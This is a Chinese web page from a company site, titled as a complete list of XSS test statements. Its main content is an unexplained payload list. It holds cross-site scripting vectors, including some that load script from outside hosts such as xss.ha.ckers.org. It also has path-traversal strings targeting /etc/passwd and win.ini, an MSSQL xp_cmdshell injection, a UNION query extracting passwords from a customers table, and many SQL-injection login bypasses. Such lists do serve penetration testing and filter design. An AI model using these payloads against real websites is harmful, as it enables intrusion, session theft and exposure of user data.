• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营

    • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    XSS测试语句大全
    '>script>alert(document.cookie)/script>
    ='>script>alert(document.cookie)/script>
    script>alert(document.cookie)/script>
    script>alert(vulnerable)/script>
    %3Cscript%3Ealert('XSS')%3C/script%3E
    s#99;ript>alert('XSS')/script>
    img src="javas#99;ript:alert('XSS')">
    %0a%0ascript>alert(\"Vulnerable\")/script>.jsp
    %22%3cscript%3ealert(%22xss%22)%3c/script%3e
    %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
    %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
    %3f.jsp
    %3f.jsp
    lt;scriptgt;alert('Vulnerable');lt;/scriptgt
    script>alert('Vulnerable')/script>
    ?sql_debug=1
    a%5c.aspx
    a.jsp/script>alert('Vulnerable')/script>
    a/
    a?script>alert('Vulnerable')/script>
    ">script>alert('Vulnerable')/script>
    ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--
    %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    %3Cscript%3Ealert(document. domain);%3C/script%3E
    %3Cscript%3Ealert(document.domain);%3C/script%3ESESSION_ID={SESSION_ID}SESSION_ID=
    1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
    ../../../../../../../../etc/passwd
    ..\..\..\..\..\..\..\..\windows\system.ini
    \..\..\..\..\..\..\..\..\windows\system.ini
    '';!--"XSS>={()}
    IMG SRC="javascript:alert('XSS');">
    IMG SRC=javascript:alert('XSS')>
    IMG SRC=JaVaScRiPt:alert('XSS')>
    IMG SRC=JaVaScRiPt:alert(quot;XSSquot;)>
    IMG SRC=#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101;#114;#116;#40;#39;#88;#83;#83;#39;#41>
    IMG SRC=#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041>
    IMG SRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29>
    IMG SRC="jav#x09;ascript:alert('XSS');">
    IMG SRC="jav#x0A;ascript:alert('XSS');">
    IMG SRC="jav#x0D;ascript:alert('XSS');">
    "IMG SRC=java\0script:alert(\"XSS\")>";' > out
    IMG SRC=" javascript:alert('XSS');">
    SCRIPT>a=/XSS/alert(a.source)/SCRIPT>
    BODY BACKGROUND="javascript:alert('XSS')">
    BODY ONLOAD=alert('XSS')>
    IMG DYNSRC="javascript:alert('XSS')">
    IMG LOWSRC="javascript:alert('XSS')">
    BGSOUND SRC="javascript:alert('XSS');">
    br size="{alert('XSS')}">
    LAYER SRC="http://xss.ha.ckers.org/a.js">/layer>
    LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    IMG SRC='vbscript:msgbox("XSS")'>
    IMG SRC="mocha:[code]">
    IMG SRC="livescript:[code]">
    META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    IFRAME SRC=javascript:alert('XSS')>/IFRAME>
    FRAMESET>FRAME SRC=javascript:alert('XSS')>/FRAME>/FRAMESET>
    TABLE BACKGROUND="javascript:alert('XSS')">
    DIV STYLE="background-image: url(javascript:alert('XSS'))">
    DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html#39;);">
    DIV STYLE="width: expression(alert('XSS'));">
    STYLE>@im\port'\ja\vasc\ript:alert("XSS")';/STYLE>
    IMG STYLE='xss:expre\ssion(alert("XSS"))'>
    STYLE TYPE="text/javascript">alert('XSS');/STYLE>
    STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}/STYLE>A CLASS=XSS>/A>
    STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}/STYLE>
    BASE HREF="javascript:alert('XSS');//">
    getURL("javascript:alert('XSS')")
    a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
    XML SRC="javascript:alert('XSS');">
    "> BODY ONLOAD="a();">SCRIPT>function a(){alert('XSS');}/SCRIPT>"
    SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg">/SCRIPT>
    IMG SRC="javascript:alert('XSS')"
    !--#exec cmd="/bin/echo 'SCRIPT SRC'"-->!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js>/SCRIPT>'"-->
    IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
    SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
    SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
    SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
    SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
    SCRIPT>document.write("SCRI");/SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
    A HREF=http://www.gohttp://www.google.com/ogle.com/>link/A>
    admin'--
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi') or ('a'='a
    hi") or ("a"="a
    您可能感兴趣的文章:
    • Python自动化测试工具Splinter简介和使用实例
    • python单元测试unittest实例详解
    • python自动化测试实例解析
    • python 测试实现方法
    • 详解Python的单元测试
    • 整理php防注入和XSS攻击通用过滤
    • 跨站式脚本(Cross-SiteScripting)XSS攻击原理分析
    • 防止xss和sql注入:JS特殊字符过滤正则
    • XSS SQL注入
    • 基于Python的XSS测试工具XSStrike使用方法
    上一篇:跨站脚本执行漏洞详解与防护
    下一篇:Mssql高级注入笔记II
  • 相关文章
    • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    XSS测试语句大全 XSS,测试,语句,大全,XSS,测试,